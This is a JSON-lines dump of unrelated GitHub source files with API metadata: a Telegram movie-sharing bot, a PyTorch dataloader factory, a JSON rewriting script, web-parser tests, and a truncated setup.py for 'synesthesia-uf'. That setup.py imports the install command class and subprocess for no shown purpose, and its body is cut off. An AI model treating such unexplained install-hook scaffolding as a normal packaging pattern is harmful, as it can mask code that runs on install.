"name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "imdb_api.views.signup.signup", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.login_view", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "imdb_api.views.login_view.logout_view", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "imdb_api.views.user_recommendations.user_recommendations", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.vote_for_movie", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.toggle_favorite", "line_number": 47, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.all_movies", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.new_movies", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.movie_details_with_trailers", "line_number": 53, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_movies", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.base_genre_movies", "line_number": 55, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 56, "usage_type": "call"}, {"api_name": "imdb_api.views.movies_view.genre_list", "line_number": 56, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView.as_view", "line_number": 59, "usage_type": "call"}, {"api_name": "imdb_api.views.user_panel_view.CommentView", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 62, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 62, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 63, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView.as_view", "line_number": 63, "usage_type": "call"}, {"api_name": "imdb_api.views.movie_serializer_view.MovieView", "line_number": 63, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", "line_number": 65, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "imdb_api.views.genre_serializer_view.GenresView", "line_number": 66, "usage_type": "name"}]}
+{"seq_id": "70772349287", "text": "import os\nimport time\nimport random\nimport logging\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup\nfrom info import START_MSG, CHANNELS, ADMINS, AUTH_CHANNEL, CUSTOM_FILE_CAPTION\nfrom utils import Media, get_file_details\nfrom pyrogram.errors import UserNotParticipant\nfrom db.mongo import insert, getid\nlogger = logging.getLogger(__name__)\n\nPHOTO = [\n \"https://telegra.ph/file/d053a8e9ef4ed93df38a0.jpg\",\n \"https://telegra.ph/file/d1c6ee6d32e142f3674ed.jpg\", \n \"https://telegra.ph/file/8fd7710ee17bd34a963a5.jpg\", \n \"https://telegra.ph/file/ecb7510e187f0e3b60852.jpg\", \n \"https://telegra.ph/file/ef7f1cbc33ac9ee47578d.jpg\", \n \"https://telegra.ph/file/a5ce5774734d8c119c630.jpg\"\n]\n\n@Client.on_message(filters.private & filters.user(ADMINS) & filters.command([\"broadcast\"]))\nasync def broadcast(bot, message):\n if (message.reply_to_message):\n ms = await message.reply_text(\"Geting All ids from database ...........\")\n ids = getid()\n tot = len(ids)\n await ms.edit(f\"Starting Broadcast .... \\n Sending Message To {tot} Users\")\n for id in ids:\n try:\n \tawait message.reply_to_message.copy(id)\n except:\n \tpass\n\n\n@Client.on_message(filters.command(\"start\"))\nasync def start(bot, cmd):\n usr_cmdall1 = cmd.text\n if usr_cmdall1.startswith(\"/start subinps\"):\n if AUTH_CHANNEL:\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n try:\n user = await bot.get_chat_member(int(AUTH_CHANNEL), cmd.from_user.id)\n if user.status == \"kicked\":\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Sorry Sir, You are Banned to use me.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n except UserNotParticipant:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"** 🔊 𝗝𝗼𝗶𝗻 𝗢𝘂𝗿 𝗰𝗵𝗮𝗻𝗻𝗲𝗹 🤭\\n\\n🔊 ഞങ്ങളുടെ 𝙈𝙖𝙞𝙣 𝘾𝙝𝙖𝙣𝙣𝙚𝙡 ജോയിൻ ചെയ്താൽ മാത്രമേ സിനിമ ലഭിക്കുകയുള്ളൂ.... 😁\\n\\nJoin ചെയ്ത ശേഷം Try Again ബട്ടൺ ക്ലിക്ക് ചെയ്യൂ.😁 **\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 JOIN OUR CHANNEL 💢\", url=invite_link.invite_link)\n ],\n [\n InlineKeyboardButton(\" 🔄 Try Again\", callback_data=f\"checksub#{file_id}\")\n ]\n ]\n ),\n parse_mode=\"markdown\"\n )\n return\n except Exception:\n await bot.send_message(\n chat_id=cmd.from_user.id,\n text=\"Something went Wrong.\",\n parse_mode=\"markdown\",\n disable_web_page_preview=True\n )\n return\n try:\n ident, file_id = cmd.text.split(\"_-_-_-_\")\n filedetails = await get_file_details(file_id)\n for files in filedetails:\n title = files.file_name\n size=files.file_size\n f_caption=files.caption\n if CUSTOM_FILE_CAPTION:\n try:\n f_caption=CUSTOM_FILE_CAPTION.format(file_name=title, file_size=size, file_caption=f_caption)\n except Exception as e:\n print(e)\n f_caption=f_caption\n if f_caption is None:\n f_caption = f\"{files.file_name}\"\n user_id = int(cmd.from_user.id)\n insert(user_id)\n buttons = [\n [\n InlineKeyboardButton('💢 Join Channel 💢', url='https://t.me/cinemacollections')\n ]]\n await bot.send_cached_media(\n chat_id=cmd.from_user.id,\n file_id=file_id,\n caption=f_caption,\n reply_markup=InlineKeyboardMarkup(buttons)\n )\n except Exception as err:\n await cmd.reply_text(f\"Something went wrong!\\n\\n**Error:** `{err}`\")\n elif len(cmd.command) > 1 and cmd.command[1] == 'subscribe':\n invite_link = await bot.create_chat_invite_link(int(AUTH_CHANNEL))\n await bot.send_photo(\n chat_id=cmd.from_user.id,\n photo=f\"{random.choice(PHOTO)}\",\n caption=\"**Please Join My Updates Channel to use this Bot!**\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"💢 Join Channel 💢\", url=invite_link.invite_link)\n ]\n ]\n )\n )\n else:\n await cmd.reply_photo(\n photo=f\"{random.choice(PHOTO)}\",\n caption=START_MSG,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('❔ How To Use Me ❔', url='https://t.me/movieReqGroup1')\n ],[ \n InlineKeyboardButton(\"Sᴇᴀʀᴄʜ Hᴇʀᴇ 🔎\", switch_inline_query_current_chat=''),\n InlineKeyboardButton(\"Group 🗯\", url='https://t.me/movieReqGroup1')\n ],\n [\n InlineKeyboardButton('Dev👩💻', url='https://t.me/DhashamoolamDhamu'),\n InlineKeyboardButton(\"About💡\", callback_data=\"about\")\n ],\n [ InlineKeyboardButton('➕ Add Me To Your Group ', url='https://t.me/Anjalina_bot?startgroup=true'),]\n ]\n )\n )\n\n\n@Client.on_message(filters.command('channel') & filters.user(ADMINS))\nasync def channel_info(bot, message):\n \"\"\"Send basic information of channel\"\"\"\n if isinstance(CHANNELS, (int, str)):\n channels = [CHANNELS]\n elif isinstance(CHANNELS, list):\n channels = CHANNELS\n else:\n raise ValueError(\"Unexpected type of CHANNELS\")\n\n text = '📑 **Indexed channels/groups**\\n'\n for channel in channels:\n chat = await bot.get_chat(channel)\n if chat.username:\n text += '\\n@' + chat.username\n else:\n text += '\\n' + chat.title or chat.first_name\n\n text += f'\\n\\n**Total:** {len(CHANNELS)}'\n\n if len(text) < 4096:\n await message.reply(text)\n else:\n file = 'Indexed channels.txt'\n with open(file, 'w') as f:\n f.write(text)\n await message.reply_document(file)\n os.remove(file)\n\n\n@Client.on_message(filters.command('total') & filters.user(ADMINS))\nasync def total(bot, message):\n \"\"\"Show total files in database\"\"\"\n msg = await message.reply(\"Processing...⏳\", quote=True)\n try:\n total = await Media.count_documents()\n await msg.edit(f'📁 Saved files: {total}')\n except Exception as e:\n logger.exception('Failed to check total files')\n await msg.edit(f'Error: {e}')\n\n\n@Client.on_message(filters.command('logger') & filters.user(ADMINS))\nasync def log_file(bot, message):\n \"\"\"Send log file\"\"\"\n try:\n await message.reply_document('TelegramBot.log')\n except Exception as e:\n await message.reply(str(e))\n\n\n@Client.on_message(filters.command('delete') & filters.user(ADMINS))\nasync def delete(bot, message):\n \"\"\"Delete file from database\"\"\"\n reply = message.reply_to_message\n if reply and reply.media:\n msg = await message.reply(\"Processing...⏳\", quote=True)\n else:\n await message.reply('Reply to file with /delete which you want to delete', quote=True)\n return\n\n for file_type in (\"document\", \"video\", \"audio\"):\n media = getattr(reply, file_type, None)\n if media is not None:\n break\n else:\n await msg.edit('This is not supported file format')\n return\n\n result = await Media.collection.delete_one({\n 'file_name': media.file_name,\n 'file_size': media.file_size,\n 'mime_type': media.mime_type\n })\n if result.deleted_count:\n await msg.edit('File is successfully deleted from database')\n else:\n await msg.edit('File not found in database')\n@Client.on_message(filters.command('about'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"Developer : Aɴᴊᴀʟɪɴᴀ \\nCode : Ɗнαѕнαмσσℓαм \\nLanguage : Python3\\nLibrary : Pyrogram asyncio \\nSource Code : Cʟɪᴄᴋ Mᴇ \\nCʜᴀɴɴᴇʟ : Channel \", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('help'))\nasync def bot_info(bot, message):\n buttons = [\n [\n InlineKeyboardButton('💢 Channel 💢', url='https://t.me/Cinemacollections'),\n InlineKeyboardButton('🗯 Group 🗯', url='https://t.me/movieReqGroup1')\n ]\n ]\n await message.reply(text=\"\"\"🙋🏻♂️ Hellooo {user_name} 🤓\n \n▶️ ꜱᴇɴᴅ ᴛʜᴇ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ᴏꜰ мovιᴇ ꜱᴇʀɪᴇꜱ ( ᴜꜱᴇ ɢᴏᴏɢʟᴇ.ᴄᴏᴍ ᴛᴏ ɢᴇᴛ ᴄᴏʀʀᴇᴄᴛ ɴᴀᴍᴇ ! ) .\n\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ\n▫️ Exᴀᴍᴘʟᴇ 2 : Lᴜᴄɪꜰᴇʀ мᴀʟᴀʏᴀʟᴀм\n▫️ Exᴀᴍᴘʟᴇ 1 : Lᴜᴄɪꜰᴇʀ 2021\n\n🔺 ɪꜰ ʏᴏᴜ ᴄᴀɴᴛ ꜰɪɴᴅ ᴛʜᴇ мovιᴇ ᴛʜᴀᴛ ʏᴏᴜ ʟᴏᴏᴋɪɴɢ ꜰᴏʀ. ᴛʜᴇɴ ʏᴏᴜ ᴄᴀɴ ꜱᴇɴᴅ ᴀ ᴍᴇꜱꜱᴀɢᴇ ᴛᴏ Dᴇᴠ \"\"\", reply_markup=InlineKeyboardMarkup(buttons), disable_web_page_preview=True)\n\n@Client.on_message(filters.command('info') & (filters.private | filters.group))\nasync def showinfo(client, message):\n try:\n cmd, id = message.text.split(\" \", 1)\n except:\n id = False\n pass\n\n if id:\n if (len(id) == 10 or len(id) == 9):\n try:\n checkid = int(id)\n except:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return\n else:\n await message.reply_text(\"__Enter a valid USER ID__\", quote=True, parse_mode=\"md\")\n return \n\n if Config.SAVE_USER == \"yes\":\n name, username, dcid = await find_user(str(id))\n else:\n try:\n user = await client.get_users(int(id))\n name = str(user.first_name + (user.last_name or \"\"))\n username = user.username\n dcid = user.dc_id\n except:\n name = False\n pass\n\n if not name:\n await message.reply_text(\"__USER Details not found!!__\", quote=True, parse_mode=\"md\")\n return\n else:\n if message.reply_to_message:\n name = str(message.reply_to_message.from_user.first_name\\\n + (message.reply_to_message.from_user.last_name or \"\"))\n id = message.reply_to_message.from_user.id\n username = message.reply_to_message.from_user.username\n dcid = message.reply_to_message.from_user.dc_id\n else:\n name = str(message.from_user.first_name\\\n + (message.from_user.last_name or \"\"))\n id = message.from_user.id\n username = message.from_user.username\n dcid = message.from_user.dc_id\n \n if not str(username) == \"None\":\n user_name = f\"@{username}\"\n else:\n user_name = \"none\"\n\n await message.reply_text(\n f\"UserInfo \\n\\n\"\n f\"Name : {name}\\n\"\n f\"UserID : {id}\\n\"\n f\"Username Name : {user_name}\\n\"\n f\"Permanant USER Link : Link ❗️ \\n\\n\"\n f\"@MovieReqGroup1 \",\n quote=True,\n parse_mode=\"html\"\n )\n\n@Client.on_message(filters.command('id') & (filters.private | filters.group))\nasync def showid(client, message):\n chat_type = message.chat.type\n\n if chat_type == \"private\":\n user_id = message.chat.id\n await message.reply_text(\n f\"Your ID : `{user_id}`\",\n parse_mode=\"md\",\n quote=True\n )\n elif (chat_type == \"group\") or (chat_type == \"supergroup\"):\n user_id = message.from_user.id\n chat_id = message.chat.id\n if message.reply_to_message:\n reply_id = f\"Replied User ID : `{message.reply_to_message.from_user.id}`\"\n else:\n reply_id = \"\"\n await message.reply_text(\n f\"Your ID : `{user_id}`\\nThis Group ID : `{chat_id}`\\n\\n{reply_id}\",\n parse_mode=\"md\",\n quote=True\n ) \n\n", "repo_name": "ccadmin1/anjalina-Imdb", "sub_path": "plugins/commands.py", "file_name": "commands.py", "file_ext": "py", "file_size_in_byte": 13905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "db.mongo.getid", "line_number": 26, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pyrogram.filters", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 22, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 22, "usage_type": "argument"}, {"api_name": "pyrogram.filters.command", "line_number": 22, "usage_type": "call"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 40, "usage_type": "name"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 41, "usage_type": "argument"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 43, "usage_type": "argument"}, {"api_name": "pyrogram.errors.UserNotParticipant", "line_number": 52, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 56, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 58, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 61, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 64, "usage_type": "call"}, {"api_name": "utils.get_file_details", "line_number": 81, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 86, "usage_type": "name"}, {"api_name": "info.CUSTOM_FILE_CAPTION.format", "line_number": 88, "usage_type": "call"}, {"api_name": "info.CUSTOM_FILE_CAPTION", "line_number": 88, "usage_type": "name"}, {"api_name": "db.mongo.insert", "line_number": 95, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 98, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 104, "usage_type": "call"}, {"api_name": "info.AUTH_CHANNEL", "line_number": 109, "usage_type": "argument"}, {"api_name": "random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 114, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 117, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 124, "usage_type": "call"}, {"api_name": "info.START_MSG", "line_number": 125, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 126, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 129, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 131, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 132, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 135, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 136, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 138, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 36, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 36, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 36, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 147, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 148, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 149, "usage_type": "argument"}, {"api_name": "info.CHANNELS", "line_number": 150, "usage_type": "name"}, {"api_name": "info.CHANNELS", "line_number": 162, "usage_type": "argument"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 144, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 144, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 144, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 144, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 144, "usage_type": "argument"}, {"api_name": "utils.Media.count_documents", "line_number": 179, "usage_type": "call"}, {"api_name": "utils.Media", "line_number": 179, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 174, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 174, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 174, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 174, "usage_type": "argument"}, {"api_name": "pyrogram.Client.on_message", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 186, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 186, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 186, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 186, "usage_type": "argument"}, {"api_name": "utils.Media.collection.delete_one", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.Media.collection", "line_number": 213, "usage_type": "attribute"}, {"api_name": "utils.Media", "line_number": 213, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 195, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 195, "usage_type": "name"}, {"api_name": "pyrogram.filters.user", "line_number": 195, "usage_type": "call"}, {"api_name": "info.ADMINS", "line_number": 195, "usage_type": "argument"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 226, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 227, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 230, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 222, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 222, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 236, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 237, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 248, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_message", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 232, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 232, "usage_type": "name"}, {"api_name": "pyrogram.Client.on_message", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 250, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 250, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 250, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 250, "usage_type": "attribute"}, {"api_name": "pyrogram.Client.on_message", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 314, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 314, "usage_type": "name"}, {"api_name": "pyrogram.filters.private", "line_number": 314, "usage_type": "attribute"}, {"api_name": "pyrogram.filters.group", "line_number": 314, "usage_type": "attribute"}]}
+{"seq_id": "2437004195", "text": "from torch.utils.data import DataLoader\n\n\ndef create_dataloader(opt):\n \"\"\"\n 从opt参数中创建dataloader\n :param opt (): a subclass of BaseOption\n :return dataloader (): A class of torch.utils.data.Dataloader\n \"\"\"\n name = opt.name\n if name == 'auto_encoder_train_option' or name == 'auto_encoder_test_option':\n from data.image_dataset import ImageDataset\n dataset = ImageDataset(opt)\n elif name == 'image_generator_train_option' or name == 'image_generator_test_option':\n from data.image_edge_dataset import ImageEdgeDataset\n dataset = ImageEdgeDataset(opt)\n else:\n raise ValueError(\"不存在option [%s] 所对应的数据集\" % name)\n\n dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=opt.shuffle, num_workers=0)\n return dataloader\n", "repo_name": "JudgementH/DeepFaceDrawing", "sub_path": "data/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data.image_dataset.ImageDataset", "line_number": 13, "usage_type": "call"}, {"api_name": "data.image_edge_dataset.ImageEdgeDataset", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "72454164328", "text": "from setuptools import setup, find_packages\r\nfrom setuptools.command.install import install\r\nimport codecs\r\nimport os, sys, subprocess\r\n\r\n\r\nVERSION = '0.1.17'\r\nDESCRIPTION = 'A Python audio image creation tool'\r\nLONG_DESCRIPTION = 'A Python audio image creation tool that takes audio and creates images from them.'\r\n\r\n\r\n# Setting up\r\nsetup(\r\n name=\"synesthesia-uf\",\r\n version=VERSION,\r\n author=\"Super Fun Adventure Club Dude Man Squad\",\r\n author_email=\" new format code\n \n newContents = OrderedDict()\n\n newContents[\"root\"] = contents[\"root\"]\n newContents[\"redirection\"] = contents[\"redirection\"]\n newContents[\"from\"] = []\n for elm in newContents[\"from\"]:\n newContents[\"from\"].append(elm)\n\n newContents[\"data\"] = []\n\n for data in contents[\"data\"]:\n _temp = OrderedDict()\n\n _temp[\"_usage\"] = data[\"_usage\"]\n\n # print(contents[\"root\"])\n _temp[\"_speech\"] = []\n for elm in data[\"_speech\"]:\n _temp[\"_speech\"].append(elm)\n\n _temp[\"_video\"] = data[\"_video\"]\n _temp[\"_chunks\"] = []\n for elm in data[\"_chunks\"]:\n _temp[\"_chunks\"].append(elm)\n\n _temp[\"_text\"] = []\n\n newContents[\"data\"].append(_temp)\n\n # print(newContents)\n \n # startIndex = 0\n # endIndex = contents.find('')\n # contents=\"\".join((contents[:startIndex],'',contents[endIndex:]))\n # print(contents)\n \n with io.open(savePath + \"/\" + d,\"w\", encoding=\"utf-8\") as openFileToWrite:\n openFileToWrite.write(json.dumps(newContents, ensure_ascii=False, indent=\"\\t\"))\n\namend(targetPath)", "repo_name": "freean2468/koreng", "sub_path": "koreng_mongo/amendIterator.py", "file_name": "amendIterator.py", "file_ext": "py", "file_size_in_byte": 3501, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "io.open", "line_number": 31, "usage_type": "call"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 65, "usage_type": "call"}, {"api_name": "io.open", "line_number": 90, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "14062740346", "text": "import unittest\n\nimport lxml\nimport requests\n\nfrom webparser.parser import convert_to_doc, FeedParser, fuzzy_url_search, has_rss_feed\nfrom webparser.utils import root_path\n\n\nclass TestParser(unittest.TestCase):\n def setUp(self):\n self.english_text = None\n with open(root_path() + \"/tests/data/medium_botify.txt\", \"r\") as w:\n self.english_text = w.read()\n\n self.chinese_text = None\n with open(root_path() + \"/tests/data/chinese_text_parsing.txt\", \"r\") as w:\n self.chinese_text = w.read()\n\n self.url = 'https://medium.com/botify-labs/no-fuss-no-ego-code-reviews-done-right-de69b5cf76e3'\n\n def test_convert_to_doc_with_text(self):\n res = convert_to_doc(self.english_text)\n\n if (res.text_content()):\n assert True\n if (isinstance(res, lxml.html.HtmlElement)):\n assert True\n\n def test_convert_to_doc_with_requests(self):\n res = requests.get(self.url)\n text = convert_to_doc(res.content)\n if text.text_content():\n assert True\n\n def test_chinese_text(self):\n text = convert_to_doc(self.chinese_text)\n if text.text_content():\n assert True\n\n\nclass TestFeedParser(unittest.TestCase):\n def setUp(self):\n self.viralnova = 'https://viralnova.com/feed'\n self.techcrunch = 'https://techcrunch.com/feed'\n self.feed_url_exists = 'https://techcrunch.com'\n self.no_feed_exists_url = 'https://contentstudio.io'\n\n def test_viralnova(self):\n feed = FeedParser(self.viralnova)\n res = feed.parse()\n if len(res['feeds']) > 5:\n assert True\n\n def test_techcrunch(self):\n feed = FeedParser(self.techcrunch)\n res = feed.parse()\n if len(res['feeds']) > 5:\n assert True\n\n def test_fuzzy_url_search(self):\n status = fuzzy_url_search(self.feed_url_exists, [])\n if (len(status) > 0):\n assert True\n\n status = fuzzy_url_search(self.no_feed_exists_url, [])\n if len(status) == 0:\n assert True\n\n def test_has_rss_feed(self):\n res = requests.get(self.feed_url_exists)\n has_feed= has_rss_feed(res.content, self.feed_url_exists)\n print(has_feed)\n", "repo_name": "d4interactive/webparser", "sub_path": "tests/test_parser.py", "file_name": "test_parser.py", "file_ext": "py", "file_size_in_byte": 2250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "webparser.utils.root_path", "line_number": 13, "usage_type": "call"}, {"api_name": "webparser.utils.root_path", "line_number": 17, "usage_type": "call"}, {"api_name": "webparser.parser.convert_to_doc", "line_number": 23, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "webparser.parser.convert_to_doc", "line_number": 32, "usage_type": "call"}, {"api_name": "webparser.parser.convert_to_doc", "line_number": 37, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 42, "usage_type": "attribute"}, {"api_name": "webparser.parser.FeedParser", "line_number": 50, "usage_type": "call"}, {"api_name": "webparser.parser.FeedParser", "line_number": 56, "usage_type": "call"}, {"api_name": "webparser.parser.fuzzy_url_search", "line_number": 62, "usage_type": "call"}, {"api_name": "webparser.parser.fuzzy_url_search", "line_number": 66, "usage_type": "call"}, {"api_name": "requests.get", 